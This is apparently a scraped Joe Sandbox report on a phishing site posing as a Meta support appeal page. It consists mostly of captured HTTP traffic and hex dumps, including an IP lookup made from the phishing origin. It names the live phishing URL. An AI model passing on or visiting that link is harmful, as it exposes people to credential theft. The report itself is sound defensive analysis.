2023-05-15 17:27:03 UTC	3531	IN	Data Raw: 34 61 66 0d 0a 7b 22 67 63 6d 5f 73 65 6e 64 65 72 5f 69 64 22 3a 22 31 35 30 35 37 38 31 34 33 35 34 22 2c 22 67 63 6d 5f 75 73 65 72 5f 76 69 73 69 62 6c 65 5f 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 65 64 67 65 5f 73 69 64 65 5f 70 61 6e 65 6c 22 3a 7b 22 70 72 65 66 65 72 72 65 64 5f 77 69 64 74 68 22 3a 33 37 36 7d 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 6e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 3f 72 65 66 3d 68 6f 6d 65 73 63 72 65 65 6e 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 6d 69 6e 69 6d 61 6c 2d 75 69 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 46 46 46 46 46 46 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 31 38 37 Data Ascii: 4af{"gcm_sender_id":"15057814354","gcm_user_visible_only":true,"edge_side_panel":{"preferred_width":376},"short_name":"Facebook","name":"Facebook","start_url":"\/?ref=homescreenpwa","display":"minimal-ui","background_color":"#FFFFFF","theme_color":"#187
2023-05-15 17:27:03 UTC	3532	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 195

Chrome Cache Entry: 197

Chrome Cache Entry: 198

Chrome Cache Entry: 199

Chrome Cache Entry: 200

Chrome Cache Entry: 201

Chrome Cache Entry: 202

Chrome Cache Entry: 203

Chrome Cache Entry: 204

Chrome Cache Entry: 205

Chrome Cache Entry: 206

Chrome Cache Entry: 207

Chrome Cache Entry: 208

Chrome Cache Entry: 209

Chrome Cache Entry: 210

Chrome Cache Entry: 213

Chrome Cache Entry: 215

Chrome Cache Entry: 216

Chrome Cache Entry: 217

Chrome Cache Entry: 218

Chrome Cache Entry: 219

Chrome Cache Entry: 220

Chrome Cache Entry: 221

Chrome Cache Entry: 222

Chrome Cache Entry: 223

Chrome Cache Entry: 224

Chrome Cache Entry: 225

Chrome Cache Entry: 226

Windows Analysis Report
https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:26:27 UTC	1434	OUT	GET /app/0d3b34df0b6b9220c260?protocol=7&client=js&version=8.0.2&flash=false HTTP/1.1 Host: ws-eu.pusher.com Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Upgrade: websocket Origin: https://meta-support-appeal-121990471.web.app Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Sec-WebSocket-Key: vRTtmnEihTE2dkrt8xC6Bg== Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2023-05-15 17:26:27 UTC	1435	IN	HTTP/1.1 426 Upgrade Required Date: Mon, 15 May 2023 17:26:27 GMT Content-Length: 0 Connection: close Upgrade: websocket

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3532	OUT	GET /rsrc.php/v3/ya/r/hsAgIHTE80C.png HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3532	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: NhnXZRdrEOgkA6YyrNobrw== Expires: Wed, 08 May 2024 00:46:47 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * origin-agent-cluster: ?0 X-FB-Debug: 4AJScUqbna1dXmWq9yQybAwA1XMKAKCpYp4Fq3U/QmTlFx7fAkBbMXaWmNfbqFeNHOcPVxxFeziV2Skoe4PrWA== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 6088
2023-05-15 17:27:03 UTC	3533	IN	Data Raw: 89 Data Ascii:
2023-05-15 17:27:03 UTC	3533	IN	Data Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 02 fd 50 4c 54 45 4c 69 71 04 6c e5 16 a3 fc 12 9b f7 8d ca ff 0b 79 ed 02 67 e2 32 96 ff 1c 9b fb 17 8a f4 1a a8 ff 07 74 e9 02 6b e4 17 a8 fe 06 74 e7 08 72 ea 0e 8c f2 0a 7f ec 06 76 e8 15 a6 fc 1a a9 ff 16 a8 fd 16 a8 fe 06 71 e7 05 71 e7 14 a0 fa 11 9b f7 01 67 e1 03 6d e5 08 7a ea 06 72 e7 0d 8c f1 00 65 e1 16 aa fe 11 97 f6 00 65 e1 0b 85 ee 13 9c f8 15 a3 fc 15 a6 fd 10 96 f5 08 7d eb 17 aa fe 10 95 f5 0c 89 f0 16 a3 fb 16 a8 fd 04 6d e4 03 6e e5 05 70 e6 09 7f ec 0f 91 f3 16 aa fe 0e 8f f3 17 ac fe 0e 8f f2 0b 86 ef 0c 87 ef 13 9d f8 14 a1 fa 17 aa fe 15 9e fa 0d 88 ef 16 aa fe 17 ab ff 13 a1 fa ff ff ff 01 66 e2 02 67 e2 04 6e e5 01 68 e2 17 a7 Data Ascii: PNGIHDRe5PLTELiqlyg2tktrvqqgmzree}mnpfgnh
2023-05-15 17:27:03 UTC	3535	IN	Data Raw: 21 79 c9 b0 fd a4 00 24 c0 db dd a9 1f 89 87 7f 1f dd cf f7 71 5a 00 30 66 8d f5 b2 94 92 8b e5 08 90 fa f8 0f e7 53 fe 0e 18 a6 59 b5 a8 0d 86 43 a8 28 51 a0 2e bc a7 70 8a 71 f1 c3 e0 d1 3f 44 3d 90 95 42 b6 b2 c1 28 04 6e 07 52 ab 6d ba c1 94 70 f1 e3 ec f8 7d 4e 2a 2a 30 1b 2e 85 31 dc 8e e3 fe 7c a2 11 b0 9e 0e fc e9 e7 ba 7e f9 83 ca ff cb aa d6 2a 55 0e b0 a6 95 fd 5d f8 17 bf 60 98 9a 60 be 2d 69 d2 60 76 d6 66 b5 24 29 d5 64 31 1c ca 0d 60 9f f4 e2 4f f3 a5 f7 1b 8f 25 b0 f3 32 03 6b 70 80 f5 19 28 bc 0f 3f 5e 78 c9 63 78 0d 85 7b 81 39 b1 a6 15 46 31 44 37 7e f8 f8 6f fa 4b 6b 19 a4 44 0c 44 41 54 50 d0 11 5c e9 c6 d9 8f 87 c8 6e 56 1e c3 0b 14 f4 15 72 9a de 35 7d 8f d0 67 10 06 12 92 19 86 44 44 26 5b 8b 2f 14 68 08 a4 21 3e 0a f2 7f 7e aa ab Data Ascii: !y$qZ0fSYC(Q.pq?D=B(nRmp}N*0.1\|~U]``-i`vf$)d1`O%2kp(?^xcx{9F1D7~oKkDDATP\nVr5}gDD&[/h!>~

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:04 UTC	3539	OUT	POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19492.BP%3ADEFAULT.2.0..0.0&__hsi=7233462025865615515&__req=2&__rev=1007493981&__s=%3A%3A0xhq8e&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171619&__user=0&dpr=1&jazoest=2939&lsd=AVpSfLhw8T4 HTTP/1.1 Host: www.facebook.com Connection: keep-alive Content-Length: 7511 sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Content-Type: multipart/form-data; boundary=----WebKitFormBoundary83n9jwiJc3ETwUs2 Accept: / Origin: https://www.facebook.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:04 UTC	3541	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 38 33 6e 39 6a 77 69 4a 63 33 45 54 77 55 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 36 38 34 31 37 31 36 32 33 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 38 33 6e 39 6a 77 69 4a 63 33 45 54 77 55 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 74 73 22 3a 22 78 54 33 77 6f 6c 74 62 49 6e 4a 6c 63 58 56 70 63 6d 56 66 59 32 39 75 5a 46 39 6c 65 48 42 76 Data Ascii: ------WebKitFormBoundary83n9jwiJc3ETwUs2Content-Disposition: form-data; name="ts"1684171623697------WebKitFormBoundary83n9jwiJc3ETwUs2Content-Disposition: form-data; name="q"[{"app_id":"256281040558","posts":"xT3woltbInJlcXVpcmVfY29uZF9leHBv
2023-05-15 17:27:04 UTC	3548	IN	HTTP/1.1 200 OK x-fb-rlafr: 0 report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), serial=() cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Access-Control-Expose-Headers: X-FB-Debug, X-Loader-Length Access-Control-Allow-Methods: OPTIONS
2023-05-15 17:27:04 UTC	3550	IN	Data Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 31 35 35 35 32 30 30 30 3b 20 70 72 65 6c 6f 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 0d 0a 58 2d 46 42 2d 44 65 62 75 67 3a 20 39 56 52 75 71 68 67 6a 31 33 51 53 63 47 41 30 61 6a 5a 55 2f 6f 31 4e 68 55 4b 2f 66 6e 6e 42 59 30 4b 7a 75 6b Data Ascii: Access-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: https://www.facebook.comVary: OriginStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: 9VRuqhgj13QScGA0ajZU/o1NhUK/fnnBY0Kzuk

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:05 UTC	3551	OUT	GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:05 UTC	3551	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Access-Control-Allow-Origin: * Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: jN3KQn2um5Jec0MvhzPgWg== Expires: Thu, 09 May 2024 23:58:01 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * origin-agent-cluster: ?0 X-FB-Debug: vAaf09s2ET50pCDgqZkNXeI0cFMWW4xVUr1MVBHLr87GoNZ6OUfs2y6tB2XMvEGxGB2ecOoECA56QYTzr5VFAg== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:05 GMT Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 4286
2023-05-15 17:27:05 UTC	3552	IN	Data Raw: 00 Data Ascii:
2023-05-15 17:27:05 UTC	3552	IN	Data Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ( @ eGcdceGjfffe
2023-05-15 17:27:05 UTC	3554	IN	Data Raw: ff eb 7e 09 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f3 b3 6e ff eb 7e 09 ff ec 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff ed 81 0b 47 ec 80 0a 95 ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 c2 8a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 09 ff ec 80 0a ff ec 80 09 ff ec 80 09 ff ec 80 0a 95 ee 83 0b bf ed 83 0b ff ed 83 0b ff ed 82 0a ff ed 83 0b ff ed 82 0a ff ed 82 0a ff ed 82 Data Ascii: ~n~~~~~~~~G

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:06 UTC	3563	OUT	GET /MetaforBusiness?ref=fbb_footerhttps://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirecthttps://developers.facebook.com/https://www.facebook.com/careers HTTP/1.1 Host: business.facebook.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:07 UTC	3565	IN	HTTP/1.1 302 Found Location: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers
2023-05-15 17:27:07 UTC	3565	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 66 62 77 69 66 69 67 61 74 65 77 61 79 2e 6e 65 74 20 2a 2e 66 62 77 69 66 69 67 61 74 65 77 61 79 2e 6e 65 74 20 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 63 64 6e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 20 2a 2e 63 64 6e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 20 6f 63 75 6c 75 73 63 64 6e 2e 63 6f 6d 20 2a 2e 6f 63 75 6c 75 73 63 64 6e 2e 63 6f 6d 20 77 77 77 2e 6d 65 74 61 2e 63 6f 6d 20 2a 2e 77 77 77 2e 6d 65 74 61 2e 63 6f 6d 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 Data Ascii: content-security-policy: default-src facebook.com .facebook.com fbwifigateway.net .fbwifigateway.net fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com cdninstagram.com .cdninstagram.com oculuscdn.com .oculuscdn.com www.meta.com *.www.meta.com data: blob: 's
2023-05-15 17:27:07 UTC	3568	IN	Data Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 31 35 35 35 32 30 30 30 3b 20 70 72 65 6c 6f 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 0d 0a 58 2d 46 42 2d 44 65 62 75 67 3a 20 2f 4f 33 58 57 59 65 57 66 46 4b 55 4f 45 2b 68 36 44 49 52 44 68 4f 4c 43 4e 6c 34 7a 56 52 79 50 4d 51 78 54 7a 32 57 4c 77 34 78 76 49 6a 37 6c 45 6e 4c 36 37 2f 44 69 56 2b 42 49 4f 31 4e 6f 32 78 73 42 6a Data Ascii: X-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: /O3XWYeWfFKUOE+h6DIRDhOLCNl4zVRyPMQxTz2WLw4xvIj7lEnL67/DiV+BIO1No2xsBj

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:06 UTC	3564	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Accept: application/json, text/plain, / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://meta-support-appeal-121990471.web.app Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://meta-support-appeal-121990471.web.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:08 UTC	3698	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://meta-support-appeal-121990471.web.app Content-Length: 23 Content-Type: application/json Date: Mon, 15 May 2023 17:27:07 GMT Vary: Origin Connection: close
2023-05-15 17:27:08 UTC	3698	IN	Data Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 37 22 7d Data Ascii: {"ip":"102.129.143.47"}

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:11 UTC	3698	OUT	GET /security/hsts-pixel.gif HTTP/1.1 Host: facebook.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:11 UTC	3699	IN	HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: image/gif report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"} x-fb-rlafr: 0 content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top permissions-policy: accelerometer=(), ambient-light-sensor=(), screen-wake-lock=(), usb=() cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: 